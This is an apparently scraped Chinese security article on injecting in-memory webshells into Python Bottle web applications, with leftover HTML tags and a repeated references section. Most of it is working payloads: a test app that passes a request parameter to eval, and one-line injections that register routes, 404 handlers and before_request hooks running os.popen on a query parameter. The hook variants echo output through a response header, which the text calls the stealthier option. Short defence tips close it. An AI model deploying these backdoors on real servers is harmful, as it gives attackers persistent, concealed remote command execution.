Bottle框架内存马注入技术研究<\/h1>

0x00 环境搭建<\/h2>
安装Bottle框架：<\/li> <\/ol>
pip3 install bottle
<\/span><\/span><\/code><\/pre>
测试环境代码示例：<\/li>
<\/ol>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span># -*- coding:utf-8 -*-<\/span>
<\/span><\/span>from<\/span> bottle import<\/span> template, Bottle, request, error
<\/span><\/span>
<\/span><\/span>app =<\/span> Bottle()
<\/span><\/span>
<\/span><\/span>@error<\/span>(404<\/span>)
<\/span><\/span>@app<\/span>.<\/span>route('\/memshell'<\/span>)
<\/span><\/span>def<\/span> index<\/span>():
<\/span><\/span>    result =<\/span> eval(request.<\/span>params.<\/span>get('cmd'<\/span>))
<\/span><\/span>    return<\/span> template('Hello {{result}}, how are you?'<\/span>, result)
<\/span><\/span>
<\/span><\/span>@app<\/span>.<\/span>route('\/'<\/span>)
<\/span><\/span>def<\/span> index<\/span>():
<\/span><\/span>    return<\/span> 'Hello world'<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    app.<\/span>run(host=<\/span>'0.0.0.0'<\/span>, port=<\/span>8888<\/span>, debug=<\/span>True<\/span>)
<\/span><\/span><\/code><\/pre>0x01 Bottle路由规则分析<\/h2>


路由装饰器@app.route()<\/code>工作原理：<\/p>

接受path参数和callback回调函数<\/li>
动态判断参数类型，自动交换path和callback角色<\/li>
创建Route对象完成路由添加<\/li>
<\/ul>
<\/li>

关键代码流程：<\/p>

route()<\/code>函数处理参数<\/li>
创建装饰器decorator<\/code>函数<\/li>
通过add_route()<\/code>方法完成路由注册<\/li>
<\/ul>
<\/li>
<\/ol>
0x02 利用callback注入技术<\/h2>


使用lambda表达式替代传统函数定义：<\/p>
app.<\/span>route("\/b"<\/span>, "GET"<\/span>, lambda<\/span>: print(1<\/span>))
<\/span><\/span><\/code><\/pre><\/li>

验证方法：<\/p>

访问\/b<\/code>路由<\/li>
观察控制台输出<\/li>
<\/ul>
<\/li>
<\/ol>
0x03 直接绑定路由注入法<\/h2>

完整POC：<\/li>
<\/ol>
app.<\/span>route("\/b"<\/span>, "GET"<\/span>, lambda<\/span>: __import__('os'<\/span>).<\/span>popen(request.<\/span>params.<\/span>get('a'<\/span>)).<\/span>read())
<\/span><\/span><\/code><\/pre>
替代方案：<\/li>
<\/ol>
app.<\/span>route("<\/span>%2F<\/span>b"<\/span>%<\/span>2<\/span>C"GET"<\/span>%<\/span>2<\/span>Clambda%<\/span>20<\/span>%<\/span>3<\/span>A__import__('os'<\/span>).<\/span>popen(request.<\/span>query.<\/span>get('a'<\/span>)).<\/span>read())
<\/span><\/span><\/code><\/pre>
特点：

直接回显命令执行结果<\/li>
无需额外回显点<\/li>
<\/ul>
<\/li>
<\/ol>
0x04 错误页面利用法<\/h2>


错误处理机制分析：<\/p>

@error()<\/code>装饰器注册错误处理函数<\/li>
处理函数接收response对象和错误信息<\/li>
<\/ul>
<\/li>

注入POC：<\/p>
<\/li>
<\/ol>
app.<\/span>error(404<\/span>)(lambda<\/span> e: __import__('os'<\/span>).<\/span>popen(request.<\/span>query.<\/span>get('a'<\/span>)).<\/span>read())
<\/span><\/span><\/code><\/pre>
触发方式：

访问不存在的路由触发404错误<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 Hook机制利用法<\/h2>


Hook类型：<\/p>

before_request: 请求前触发<\/li>
after_request: 请求后触发<\/li>
其他内置hook事件<\/li>
<\/ul>
<\/li>

响应头回显POC：<\/p>
<\/li>
<\/ol>
app.<\/span>add_hook('before_request'<\/span>, 
<\/span><\/span>    lambda<\/span>: __import__('bottle'<\/span>).<\/span>response.<\/span>set_header(
<\/span><\/span>        'X-flag'<\/span>, 
<\/span><\/span>        __import__('base64'<\/span>).<\/span>b64encode(
<\/span><\/span>            __import__('os'<\/span>).<\/span>popen(
<\/span><\/span>                request.<\/span>query.<\/span>get('a'<\/span>)
<\/span><\/span>            ).<\/span>read().<\/span>encode('utf-8'<\/span>)
<\/span><\/span>        ).<\/span>decode('utf-8'<\/span>)
<\/span><\/span>    )
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>
利用abort函数回显POC：<\/li>
<\/ol>
app.<\/span>add_hook('before_request'<\/span>, 
<\/span><\/span>    lambda<\/span>: __import__('bottle'<\/span>).<\/span>abort(
<\/span><\/span>        404<\/span>, 
<\/span><\/span>        __import__('os'<\/span>).<\/span>popen(request.<\/span>query.<\/span>get('a'<\/span>)).<\/span>read()
<\/span><\/span>    )
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>
注意事项：

abort方法会触发异常，可能影响业务<\/li>
建议使用响应头回显方式更隐蔽<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>


输入验证：<\/p>

对所有用户输入进行严格过滤<\/li>
禁用危险函数如eval、exec等<\/li>
<\/ul>
<\/li>

安全配置：<\/p>

生产环境关闭debug模式<\/li>
限制路由注册权限<\/li>
<\/ul>
<\/li>

监控措施：<\/p>

监控异常路由添加行为<\/li>
检查响应头中的可疑字段<\/li>
<\/ul>
<\/li>
<\/ol>
参考资源<\/h2>

天工实验室相关研究：https:\/\/research.qianxin.com\/archives\/2329<\/li>
Bottle框架官方文档<\/li>
Python安全编程最佳实践<\/li>
<\/ol>
Bottle框架内存马注入技术研究<\/h1>

参考资源<\/h2> 天工实验室相关研究：https:\/\/research.qianxin.com\/archives\/2329<\/li> Bottle框架官方文档<\/li> Python安全编程最佳实践<\/li> <\/ol>

参考资源<\/h2>

天工实验室相关研究：https:\/\/research.qianxin.com\/archives\/2329<\/li>
Bottle框架官方文档<\/li>
Python安全编程最佳实践<\/li> <\/ol>
